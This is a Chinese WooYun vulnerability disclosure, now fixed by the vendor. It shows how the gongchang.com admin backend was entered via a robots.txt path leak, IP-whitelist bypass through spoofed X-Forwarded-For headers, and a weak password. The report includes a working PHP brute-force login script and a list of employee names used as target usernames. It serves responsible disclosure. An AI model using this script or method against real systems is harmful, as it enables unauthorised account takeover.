当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107414

漏洞标题:世界工厂网某系统弱口令,突破ip限制

相关厂商:世界工厂网

漏洞作者: 路人甲

提交时间:2015-04-13 10:15

修复时间:2015-04-15 08:41

公开时间:2015-04-15 08:41

漏洞类型:网络敏感信息泄漏

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-15: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

一朋友到这家公司去工作了,送他一个礼物
第一次来wooyun啊,类型选错了帮改改,谢谢
就登录进去后嘛都没干- -#怕朋友吵我

详细说明:

首先从www.gongchang.com主站入手
在http://www.gongchang.com/robots.txt中泄漏了一个后台路径

Robots.txt
User-agent: *
Disallow: /d/
Disallow: /e/engongchang_admin/


打开http://www.gongchang.com/e/engongchang_admin/

2.png


是帝国6.0的后台,这个版本中有不少漏洞但都是后台登录后能执行的,因为我没找到这个系统的前台页面和帝国有什么关系!
随便扔进去个密码
username=123
password=123
显示
Ip(8.8.8.8) be prohibited.
刚好用的是firefox装了x-forward插件ip设置的是8.8.8.8
既然ip获取的是x-forward-for那就伪装ip吧
打开QQ,给朋友发了个gif图片,ip就看到了(对不住了...)

1.192.121.217


果然

信息提示
您的用户名与密码有误,也可能您的帐号已被禁用,请重输
如果您的浏览器没有自动跳转,请点击这里


不再显示IP不被允许了
这时候我跑了admin弱口令一堆没辙了...
忽然想起来朋友给我发的一个国内不翻墙上google的方法的链接
http://team.xizhi.com/thread-3162-1-1.html
是他公司的交流论坛,但它是开放的,顿时用户名有了,
总结了下上面出现的名字,结合js脚本跳转,写了个脚本,挂上弱口令跑下

<?php   
set_time_limit(0);
function http($user,$pass){
    $url = 'http://www.gongchang.com/e/engongchang_admin/ecmsadmin.php';  
    $header = array(
        'CLIENT-IP:1.192.121.217', 
        'X-FORWARDED-FOR:1.192.121.217', 
    );
    $data = array('username'=>$user,'password'=>$pass,'enews'=>'login','adminwindow'=>0,'imageField.x'=>46,'imageField.y'=>14);
    $curl = curl_init();
    curl_setopt ( $curl, CURLOPT_POST, 1 );
    curl_setopt($curl,CURLOPT_HTTPHEADER,$header);
    curl_setopt($curl,CURLOPT_URL,$url);
    curl_setopt($curl,CURLOPT_TIMEOUT,5);  
    curl_setopt ($curl, CURLOPT_POSTFIELDS, $data);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $r = curl_exec($curl);
    curl_close($curl);
    return $r;
}
$unames = array('王兰兰','刘建辉','李方超','孟伟','文帅营','闫艳利','金宏威','彭东江','王文官');
$pfile = './pass.txt';
$file = fopen($pfile,'r+');
foreach($unames as $v){
    while($f = fgets($file))
    {
        $res = http($v,trim($f));
        $len = strpos($res,'\'admin.php');
        if($len){
            fclose($file);
            print_r('user:'.$v.'_pass:'.$f);die;
        }
    }
}
fclose($file);


结果第一个就跑出来了

QQ截图20150412102429.png


超级管理员权限,

QQ截图20150412102242.png


如果朋友知道了这个...一定会说这个站安全上惨不忍睹,因为我的站就被他这么说过!

漏洞证明:

QQ截图20150412102242.png


如上

修复方案:

ip限制严格些
弱口令改改
升级帝国,否则getshell很轻松

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-04-13 10:22

厂商回复:

感谢,稍后修复

最新状态:

2015-04-15:漏洞已修复

漏洞评价:

评论